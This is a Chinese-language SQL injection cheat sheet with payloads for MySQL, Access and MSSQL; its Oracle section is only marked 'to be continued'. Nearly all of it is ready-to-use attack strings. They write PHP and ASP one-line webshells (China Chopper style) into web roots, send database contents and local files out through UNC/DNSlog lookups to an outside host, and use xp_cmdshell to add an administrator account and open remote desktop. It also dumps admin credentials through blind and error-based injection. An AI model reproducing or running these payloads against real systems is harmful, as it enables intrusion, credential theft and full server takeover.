SQL注入-不同数据库下的注入方式

MYSQL

01. MySql >= 5.0

0x01 获取字段数并确定显示位

• 通过order by num （num=1,2,3···）当报错时的前一个数就是列数

0x02 获取系统数据库

• select 1,2,schema_name from information_schema.schemata

0x03 获取当前数据库

• select 1,2,database()

0x04 获取数据库表

• select 1,2,...,group_concat(table_name) from information_schema.tables where table_schema=database()
• select 1,2,...,table_name from information_schema.tables where table_schema=database() limit 0,1

0x05 获取字段名

• select 1,2,...,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'

0x06 获取数据

• select group_concat(字段名,字段名) from (tableName)

02. MySql<5.0

• MySQL < 5.0 没有信息数据库information_schema，所以只能手工枚举爆破（二分法思想）。 该方式通常用于盲注。

03.文件导入导出

Mysql 中读写文件主要是load_file和into outfile 和 into dumpfile, mysql 的导入导出的功能从mysql5版本起都受 系统变量@@secure_file_prev 影响

查看：show global variables like '%secure%';

如果变量设置为目录的名称，则服务器会将导入和导出操作限制在跟这个目录中一起使用。这个目录必须存在，服务器不会自己创建它。 如果变量为空，则不会产生影响，引起不安全的配置。 如果变量设置为NULL，那么服务器就会禁用导入和导出操作。这个值从(MySQL 5.5.53)版本开始允许。

利用into outfil/dumpfile写文件

into outfile 和 into dumpfile的区别 : outfile 写完文件后会在文件后加一个\n换行符，而dumpfile不会

• :要知道网站绝对路径，可以通过报错，phpinfo界面，404界面等一些方式知道
• :要有file权限，默认情况下只有root有
• :对目录要有写权限，一般image之类的存放突破的目录就有

如果存在以上条件，还可以注入，那么就可以用into outfile写文件

例如:

http://127.0.0.1/index.php?age=-1 union select 1,2,3,4,0x3c3f706870206576616c28245f504f53545b27736b79275d293f3e into outfile ‘H:/wamp64/www/233.php

load_file()

1、必须有权限读取并且文件必须完全可读 　

2、欲读取文件必须在服务器上

3、必须指定文件完整的路径

4、欲读取文件必须小于 max_allowed_packet

如果存在以上条件，还可以注入，那么就可以用load_file()读文件 例如:

http://127.0.0.1/index.php?age=-1 union select 1,2,3,4,load_file(‘H:/wamp64/www/233.php’)

在mysqld的配置中设置该属性为空

secure-file-priv=

OOB注入

UNC( Universal Naming Convention)/通用命名规则 Windows主机默认存在, Linux主机默认不存在

select load_file(concat('\\\\',version(),'.dd.ceye.io\\a.txt'));
select load_file(concat('\\\\',database(),'.dd.ceye.io\\a.txt'));

当数据过长时或者包含特殊字符时可以采用如下方式

select concat(to_ base64(substr(load_ file("C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\my.ini"),1,15)),".example.com") as result; 1.使用load_file()读取文件内容 2.使用substr()对文件内容进行切片 3.使用to_base64() 对切片的内容进行编码 4.使用concat()将编码后的内容与域名进行拼接 5.使用load_file()访问该UNC路径

无列名注入

使用union select

select c from (select 1 as a, 1 as b, 1 as c union select * from test)x limit 1 offset 1
select `3` from(select 1,2,3 union select * from admin)a limit 1,1

//无逗号，有join版本
select a from (select * from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from test)x;

盲注

((SELECT 1,concat('{result+chr(mid)}', cast("0" as JSON)))<(SELECT * FROM `f1ag_1s_h3r3_hhhhh`))

要求后面select的结果必须是一行。mysql中对char型大小写是不敏感的，盲注的时候要么可以使用hex或者binary。 这里只能使用concat将字符型和binary拼接，使之大小写敏感，JSON也可以使用char byte代替

无select

mysql 8.0.19新增语句table https://dev.mysql.com/doc/refman/8.0/en/table.html

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

可以把table t简单理解成select * from t，和select的区别在于

• table总是显示表的所有列
• table不允许任何的行过滤;也就是说，TABLE不支持任何WHERE子句。 可以用来盲注表名

admin'and\x0a(table\x0ainformation_schema.TABLESPACES_EXTENSIONS\x0alimit\x0a7,1)>
(BINARY('{}'),'0')#

同时代替select被过滤导致只能同表查询的问题

PS：新增的values语句也挺有意思，在某些情况似乎可以代替union或select进行order by盲注

Access

Access数据库windows平台下的小型数据库，搭建方便，维护简单，因此一般是与windowns下的iis中间件一起用的

找注入点并确定数据库类型

找注入点

'          ● 返回错误
and 1=1    ● 返回正常
and 1=2    ● 返回错误
# 满足以上条件即存在注入

判断iis后的数据库类型

该方法是通过查询其数据特有表来进行判别的 msysobject无访问权限访问必然报错

and exists (select * from msysobjects)>0 #(报错正常，即无权限)，即可判断其为Access数据库
and exists (select * from sysobjects)>0  #(报错正常)，即可判断其为MSSQL数据库

猜数据库名和字段

access数据库没有有效办法获取库表名，只能通过暴力破解的方式一个一个的尝试，并且access没有注释

猜解数据库表名 access数据库没有库名的概念，直接就是表

and exists(select * from 表名) 
# 一个一个猜，猜中为止,例如：
http://XXX?id=1 and exists(select * from users) 
http://XXX?id=1 and exists(select * from admin)
http://XXX?id=1 and exists(select * from administrator) 

猜字段：

and exists(select 字段名 from 表名)
# 一个一个猜，猜中为止 例如：
http://XXX?id=1 and exists(select username from administrator)
http://XXX?id=1 and exists(select user_name from administrator)
http://XXX?id=1 and exists(select password from administrator)

爆破access中的数据

猜字段长度和数据（标准）

猜解字段长度 通过上述步骤可以知道，数据库表名是“administrator”,表中字段有“user_name”和“password”。

#用返回的对错猜测
and (select top 1 len(user_name) from administrator)>xx

#如以下报错，可确定字段数目为5
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>3    ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>4   ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>5  ●报错

猜解字段内容

and (select top 1 asc(mid(user_name,1,1)) from administrator)>xx

#先判断第一个字母，是汉字还是字母
## 返回正常页面说明ASCII值大于0 ,是字母
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>0

# 二分法确定acsii码,
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>100
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>50
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>75

# 最后根据确定下来的acsii码97，反查对应表得到第一个字母为a，在用同样的方法确定出来其他位字母
## 密码的话一般会做md5加密，记得用网站的解密工具尝试（简单的可以反解成功）

小提示: access数据库都是存放在网站目录下，后缀格式为mdb，asp，asa,可以通过一些暴库手段、目录猜解等直接下载数据库，如果是MSSQL、MYSQL等，一般数据库是存储在数据库安装路径下，后缀格式为myi，myd，frm，mdf 不能通过下载得到库。除非走狗屎运，对方管理员把网站库备份在网站目录下。

用联合查询方案注入（通用）

首先还是要先猜解出所需的表的表名和字段名，这个没有办法 再用order by语句排序，根据排序数量，可知当前页面可查询字段数，假设为7 再通过union查询数字，确定出页面可显示的字段(假设是第2和3字段) 最后通过union语句联合查询指定表(在可显示的字段替换为需要查询的表中的字段)

order by 7
and 1=2 union select 1,2,3,4,5,6,7 from admin
and 1=2 union select 1,user_name,passwoed,4,5,6,7 from admin

偏移注入和跨库查询

偏移注入

偏移注入会随机爆出一个字段内容，具体是什么看运气 偏移注入只针对Access数据库，当我们只猜到数据库表名但猜不到列名的情况下，这种方法可以帮我们填补。

#第一步:使用之前的方法得到显示点为2,3，字段个数为7，但是我们并不知道列名
http://XXX?id=14 union select 1,2,3,4,5,6,7 from administrator

#第二步:用*依次向前替换数字字段，直到页面显示正常。例如在5替换为*后页面返回正常
http://XXX?id=14union select  1,2,3,4,* from administrator
#说明星号替换了3个字段(也就是表中有三个字段),后续要使用inner jion自表连接查询，因此计算字段数乘以2是否小于当前列(3*2<7)

#第三步:公式成立的话，用inner jion自连接查询
http://XXX?id=14 union select 1,*  from (administrator as a inner join administrator as b on a.id=b.id)

#如果是更多位，可再接inner join
http://XXX?id=14 union select 1,* from ((administrator as a inner join administrator as b on a.id=b.id) inner join administrator as c a.id=c.id)

跨库查询

假设a和b两个站点在同一服务器上面，但a服务器上面安装了安全狗、Waf这样的安全软件，现在我们要对a站点进行攻击，但是没发现什么大漏洞，只找到网站数据库路径，对数据库下载发现下载不了。 这个时候我发现b站点有注入点。并且知道了“2和3”是注入点，可以通过跨库的方式，读取指定目录下access数据库的数据。

http://xxx?id=14 union select 1,adminpassword,username,4,5,6,7 from[C:\wwwtest\2AspCMS\AspCms_data\data.asp].Aspcms_Admins

MSSQL

在MSSQL中每个库都有一个系统自带表–>sysobjects

​ 此系统表中对我们有用的只有3个字段，NAME字段和XTYPE字段和ID字段，name就是表名信息，xtype是代表表的类型，只有两个参数，S代表系统自带表，U代表用户创建的表，id字段的值用来连接syscolumns表

mssql有三个权限，sa（最高权限，相当于system），db（文件管理，数据库操作等等，相当于user-administrator），public（数据库操作权限，相当于guest-users）

第一步：注入点类型的判断

首先要对MsSQL注入点进行一下基本的注入检测，然后判断是否是MsSQL注入点

# 如果页面返回正常，则说明为MsSQL注入点。
and exists (select * from sysobjects) >0

第二步：获取当前系统用户名

and system_user=0
# system_user是查询当前数据库系统的用户名，是字符型,与整型数据进行对比时,类型不匹配会造成数据库报错。
# 从返回的错误信息中，可得知当前系统用户名。（如果不行，换个浏览器试试可能就成功了）

第三步：判断注入点权限

and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('db_owner'))
and 1=(select is_srvrolemember('public'))

如果查询返回正常页面，则说明当前数据库用户具有sa、db_owner、public权限，
sa为数据库用户中最高权限，默认也是系统权限，对服务器安全威胁是相当高的。
如果数据库与Web服务器是同一个，默认情况下可以通过MsSQL自带的存储过程对整个服务器进行控制。
db_owner 权限的话，我们可以找到WEB的路径，然后用备份的方式得到webshell，有时也可以对注册表进行操作。
public 权限的话，又要面对表和列了，不过MSSQL比ACCESS的“猜”表方便许多，这里是“暴”表，使目标直接暴出来。
如果权限不足，可通过注入点猜解数据库内容获得管理员账号。

第四步：MsSQL返回信息判断

and @@version>0
# 从页面返回的错误信息中，可以得到数据库版本信息。
# 如果页面出错，但未返回可利用的信息，则说明MsSQL关闭了错误信息提示，
# 在猜解数据库内容时，就不能用爆库的方法了，只能使用union select联合查询或盲注入攻击方法。

# 如下查询检测，获得更多的关于MsSQL注入点的信息。
## 判断MsSQL支持多行语句查询
;declare @d int 
# 是否支持子查询
and (select count (1) from [sysobjects])>=0
# 获取当前数据库用户名
and user>O
# 获取当前数据库名称
and db_name>0
# 当前数据库名
and l=convert (int,db_name ()) 或 1=(select db_name ())
# 本地服务名
and 1=(select @@servername)
# 判断是否有库读取权限
and 1=(Select HAS_DBACCESS ('master'))

#mssql中用联合查询时判断显示位时必须要用null来代替1，2，3 并且可以用加'号的形式来确定输出位置
and 1=2 union all select null,null
#查询表
and 1=2 union all select null,(select top 1 name from schemaname.dbo.sysobjects where xtype ='u')
其中xtype查询的是数据库中表是由谁创建的有 u 和 s 两个属性
sysobjects和mysql中的information_schema表相似
#查列
and 1=2 union all select null,(select top 1 col_name(object_id('tablename'),1) from sysobjects)
#查数据
and 1=2 union all select null,(select top1 colnmae from tablename)

第五步：利用MsSQL扩展存储注入攻击

扩展存储过程是MsSQL提供的特殊功能。 所谓“扩展存储过程”，其实就是一个普通的Windows系统DLL文件，按照某种规则实现了某些函数功能. MsSQL利用扩展存储可以实现许多强大的功能，包括对系统进行操作.利用这个特性，在实施MsSQL注入攻击时，可以更容易地对系统进行控制。

xp_cmdshell是什么？ 答：SQL中运行系统命令行的系统存储过程，一般在安全级别较高的服务器上，建议关闭或限制访问权限。

可以使用外围应用配置器工具以及通过执行 sp_configure 来启用和禁用 xp_cmdshell。

# 提交如下查询进行检测。查看xp_cmdshell、xp_regread扩展存储过程是否被删除。
and 1=(Select count(*) FROM master. dbo.sysobjects  Where xtype ='X' AND name = 'xp_cmdshell')
and 1=(Select count(*) FROM master. dbo.sysobjects  Where name = 'xp_regread')

#如果扩展存储被删除，可执行如下查询进行恢复。
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

## 或者以下一系列语句：
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --

攻击中最常利用的扩展存储

xp_cmdshell—利用此存储过程可以直接执行系统命令。 xp_regread—利用此存储过程可以进行注册表读取。 xp_regwrit一利用此存储过程可以写入注册表。 xp_dirtre一利用此存储过程可以进行列目录操作。 xp_enumds—利用此存储过程可以进行ODBC连接。 xp_loginconfig-利用此存储过程可以配置服务器安全模式信息。 xp_makecab一一利用此存储过程可以创建压缩卷。 xp_ntsec_enumdomains-利用此存储过程可以查看domain信息。 xp_terminate_jroces一利用此存储过程可以查看终端进程，给出一个进程PID. 结合上面的这些扩展存储，通过提交精心构造的查询语句，可利用扩展存储的强大功能进行攻击。

第六步：SA权限下扩展存储攻击利用方法→3389远程终端

SA权限判断

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

利用扩展存储开启远程终端步骤：

# 1.添加账号：
;exec master..xp_cmdshell 'net user test test /add'
# 2.提权账号：加入admin组
;exec master..xp_cmdshell 'net localgroup administrators test /add'
# 3.开启3389端口：不报错就表示成功
;execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
# 4.链接3389端口控制对方的电脑
输入目标的IP，账号密码就是test，连接成功后退出的话点击断开，不要关机。

⛔sa权限下，还有如下几种方法都可以获得目标的webshell。

• 利用 xp_regwrite 操作注册表与开启沙盒模式
• 利用 sp_makewebtask 写入一句话木马
• 利用 sp_oacreate 存储远程下载文件
• 利用 sp_addlogin 扩展管理数据库用户
• 利用 xp_servicecontrol 管理服务

第七步：dbowner 权限利用方法（ ）

dbowner权限判断

and 1=(SELECT IS_MEMBER('db_owner'));--

⛔当数据库连接账户为dbowner权限时，无法直接利用扩展存储执行各种系统命令，进行攻击的过程比较烦琐。

1. 通常首先利用xp_dirtree扩展存储列出Web目录，
2. 然后利用SQL语句创建一个临时表，插入一句话木马到临时表中。
3. 然后利用数据库备份语句，将数据库备份到Web目录并保存为ASP格式的文件，即可得到一个一句话木马后门。
4. 最后利用一句话木马客户端连接后门，得到WebShell后就可以控制整个服务器了。

🔰db_owner目前公开的方法主要有五种： 第一种：就是最普遍的backup，现在利用差异备份生成的asp文件确实要比以前小拉不少，但能否得到webshell，目前成功率还不是很高。 第二种：就是在下的万能提权，此法成功率几乎为零，只有在特定的条件下面才能实现。 第三种：就是LCX大牛在《MSSQLdb_owner角色注入直接获得系统权限》所说的利用xp_regread读出VNC在注册表的加密密码，然后破解，直接拿到系统权限，这种方法局限性比较大，要是对方主机没有装vnc，你怎么办。 第四种：就是利用xp_regwrite再注册表里直接加个系统帐号或者直接写个webshell，在主机重起的时候就可以拿到webshell或者系统权限。此法适用范围比较大，成功率也相对前3种较高点，但缺点也是显而易见的，就是不能够马上得到webshell，需要对方重起。 第五种：就是利用添加作业的一些存储过程，sp_add_job，sp_addtask，xp_dirtree之类得到系统权限。理论上应该说是目前这5种里面成功率最高的的一种，

下面我们就重点介绍一下第五种方法。

1.找出网站安装路径：

当Web服务器与数据库在同一服务器主机上时，就可以备份一句话木马到Web目录了。但是在备份一句话木马前，首先需要搜索Web目录，可通过如下几个步骤实现。 第壹种方法：通过报错或baidu、google等查找 第贰种方法：这种方法需要满足三个条件，可以获取目标的所有盘符和深度

1. SQL SERVER允许执行多行语句；
2. 该网站能进行注入；
3. 没有返回详细的错误提示信息(否则没有必要用这种方法)。

# 1. 删除表black；首先建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树 ，该表的dir字段表示目录的名称，depth字段表示目录的深度。
;drop table black;create table temp(dir nvarchar (255), depth varchar(255),files varchar(255), id int not null identity (1,1))--
# 2. 然后执行xp_dirtree获得D盘的目录树
;insert into temp(dir,depth,files) exec master.dbo.xp_dirtree 'D:',1,1--
# 3. 查看D盘有几个文件夹，这样对D盘有个大致的了解
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...)
# 4. 接着在对方的网站上找几个一级子目录，如user、photo，然后，用筛选的方法来判断WEB根目录上是否存在此盘上
## 看语句的返回结果，如果为真，表示WEB根目录有可能在此盘上
and (select count(*) from temp where  dir<>'user')<(select count(*) from temp)
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
# 5. 假设找到的WEB根目录在此盘上，用下面的语句来获得一级子目录的深度：
## 假设得到的depth是3,说明user目录是D盘的3级目录，则WEB根目录是D盘的二级目录。
and (select depth from temp where dir='user')>=数字  #数字=1、2、3...
# 6. 接下来，另建一个临时表temp1，用来存放D盘的1级子目录下的所有目录
;create table temp1(dir nvarchar(255),depth varchar(255));--
# 7. 然后把从D盘的第一个子目录下的所有目录存到temp1中
declare @dirname varchar(255);set @dirname='D:/'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
# 8. temp1中已经保存了所有D盘第一级子目录下的所有目录,用同样的方法来判断根目录是否在此一级子目录下
## 如果返回为真，表示根目录可能在此子目录下，记住要多测试几个例子，如果都返回为假，则表明WEB根目录不在此目录下
## 用同样的方法来获得D盘第2、3...个子目录下的所有目录列表，来判断WEB根目录是否在其下。
## 要注意，用xp_dirtree前一定要把temp1表中的内容删除。
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
# 9.假设WEB根目录在D盘的第一级子目录下，该子目录名称为website,
## 前面我们知道了WEB根目录的深度为2，我们需要知道website下到底哪个才是真正的WEB根目录。
## 用同样的方法，再建立第3个临时表 temp2
;create table temp2(dir nvarchar(255),depth varchar(255));--
# 10. 然后把从D盘的website下的所有目录存到temp2中
declare @dirname varchar(255);set @dirname='D:/website/'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
# 11.用同样的方法判断该目录是否为根目录
## 如果返回为真，为了确定我们的判断，多测试几个例子，方法上面都讲到了，如果多个例子都返回为真，那么就确定了该目录为WEB根目录。
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
用以上的方法基本上可以获得WEB根目录，现在我们假设WEB根目录是：D:/website/www
# 12. 查询临时表中的内容，也就是指定的目录文件和文件夹名。由于不能一次性获取所有目录文件和文件夹名，因此需要更改id的值，依次列出文件和文件夹来。
and (select dir from temp where id=1)>0

2.获取数据库用户名

'http://192.168.1.55/sqlserver/1.aspx?xxser=1 and db_name() =O--

3.写入一句话木马：

方法一：一句话木马’（通过中国菜刀）

%20;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20c:\wwwtest\iis-xxser.com--wwwroot\muma.asp'--

# <%eval%20request("chopper")%>   是一句话木马，需要根据web的不同而变化
# c:\wwwtest\iis-xxser.com--wwwroot\   是路径
# muma.asp   是一句话木马的名字

方法二：差异备份’（此方法数据库必须曾经备份过事务日志）

;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\wwwtest\iis-xxser.com--wwwroot\yjh.asp';alter database testdb set RECOVERY simple

# (0x3C2565786375746528726571756573742822636D64222929253E)   是一句话木马的16进制编码
# C:\wwwtest\iis-xxser.com--wwwroot\   是物理路径
# yjh.asp   是一句话木马的名字

也可以使用工具代替上述操作（GetWebShell）,然后用菜刀连接目标

• 地址为：目标的根目录地址然后/muma.asp
• 密码为：“chopper” 然后就可以进入对方的服务器了。

第八步：public权限利用方法

# public权限检测
and db_name()=0--
# 1.获取mssql所有数据库名和路径
%20and%200=(select%20top%202%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--

# 2.获取当前数据库所有表名
and 0<>(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500 and name not in (select top 2 name from testdb.dbo.sysobjects where xtype=0x7500))--

# 3.爆表名及字段名
having 1=1--  ●爆出了admin.id
group by admin.id having 1=1--  ●又爆出了admin.name
group by admin.id,admin.name having 1=1-- ●又爆出了admin.passwd
# 4、获取字段内容
//and//(select//top//1//isnull(cast([id]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]//as//nvarchar(4000)),char(32))//from//[testdb]..[admin]//where//1=1//and//id//not//in//(select//top//0//id//from//[testdb]..[admin]//where//1=1//group//by//id))%3E0//and//1=1

Oracle

待续